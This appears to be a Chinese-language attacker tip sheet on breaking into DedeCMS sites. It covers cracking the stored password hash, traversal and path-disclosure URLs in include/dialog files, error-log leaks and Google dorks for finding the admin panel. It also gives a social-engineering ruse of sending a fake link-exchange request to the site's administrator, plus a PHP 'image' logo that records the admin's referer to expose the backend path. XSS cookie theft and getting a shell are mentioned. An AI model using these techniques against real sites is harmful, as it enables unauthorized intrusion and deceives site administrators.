解密:织梦密码是cmd5加密,为20位,去掉前三位与后一位。

后台:默认的是dede/login.php

1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理

员帐号,新版本的就直接转向了后台.

2.include/dialog/config.php会爆出后台管理路径

3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录

4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径.

5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉

到根目录去.不过这些版本的访问地址有些不同.

地址为require/dialog/select_soft.php?activepath=/././././././././

include\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦..

存在相同问题的文件还有

include\dialog\select_images.php

include\dialog\select_media.php

include\dialog\select_templets.php

6.有时后台也可以利用http://xxx.com/include/fckeditor/editor/fckeditor.html直接跳转到后台

或者网址名称其他的一些。




首先是默认后台地址:/dede

然后,比较懒的站长会改成/admin,/manage (可以用burpsuite进行目录枚举)

织梦dedecms利用文件查找后台的技巧: 
1、/include/dialog/select_media.php?f=form1.murl 

2、/include/dialog/select_soft.php 

3.使用mysql_error 信息去试试 
/data/mysql_error_trace.inc  —— 建议使用该方法屡试屡爽 
 
4./robots.txt 
/data/admin/ver.txt 

5.DedeCmsV5.1 FreeSP1访问  
http://127.0.0.1/include/dialog/ … =/include/FCKeditor 
可以跳转目录跳转到根目录的方法为: 
http://127.0.0.1/include/dialog/ … h=/././././././././ 
而且DEDECMS在访问不存在的目录时会报错如访问 
http://127.0.0.1/include/dialog/ … t0pst0pst0pst0pst0p 
DedeCMS V5.3.1和最新的DedeCMS V5.5正式版,发现这两个版本已经进行了处理,而且只会列出目录和一些允许显示的文件,PHP是不能显示了,爆路径是一样通用的构造 

http://127.0.0.1/include/dialog/ … =/include/FCKeditor

其实方法很简单自己偶然发现的: 

通过百度的浏量统计找到后台地址 
只要是流量统计网站都可以,其实不用百度, 
(1)xxoo:弄一个你能看到流量统计的域名 
(2)ooxx:去给管理员留言,吧你域名通过网站留言发给他说要加友情链接,他肯定会在后台看的, 

(3)oxxo:等他看了你的留言,他肯定会打开你的网址,你去自己域名的流量哪里看看     '入口页面'   就能看到他网站的后台地址 

7.利用xss

这个不能单单算是找后台了,因为xss会x到管理的cookie和后台地址,或者是xss结合csrf可以直接拿shell,详细请见wooyun

8.google hack

在搜索引擎里面所有这个关键字,点开连接之后,再去掉这个关键字,他的后台就出来了
原理就是dedecms网站的后台都有这么一个广告,而且通常都是在网站后台后面
所以,只要有这个广告的网站,基本都能暴露后台了。

这是关键字

inurl:?dopost=showad site:xxoo.com

9.织梦某处设计缺陷导致后台地址泄露

DEDECMS对友情链接申请的LOGO地址没有进行严格的判断和过滤,导致可以提交PHP、ASP等后缀。
且后台查看友情链接时,如下图所示,图片仍是申请时提交的URL。


X.PHP 代码:

1 <?php
2 file_put_contents('x.txt',$_SERVER['HTTP_REFERER']);
3 header("Content-type:image/jpeg");
4 $img=imagecreatefromjpeg("x.jpg");
5 imagejpeg($img);
6 imagedestroy($img);
7 ?>




当访问该文件,获取$_SERVER['HTTP_REFERER'],并且写出文件到X.TXT。


其他方法:可以社工猜解,利用google hack :"site:xxoo.com inurl:login.php 织梦管理中心"

如果还是日不下来,换个思路吧~~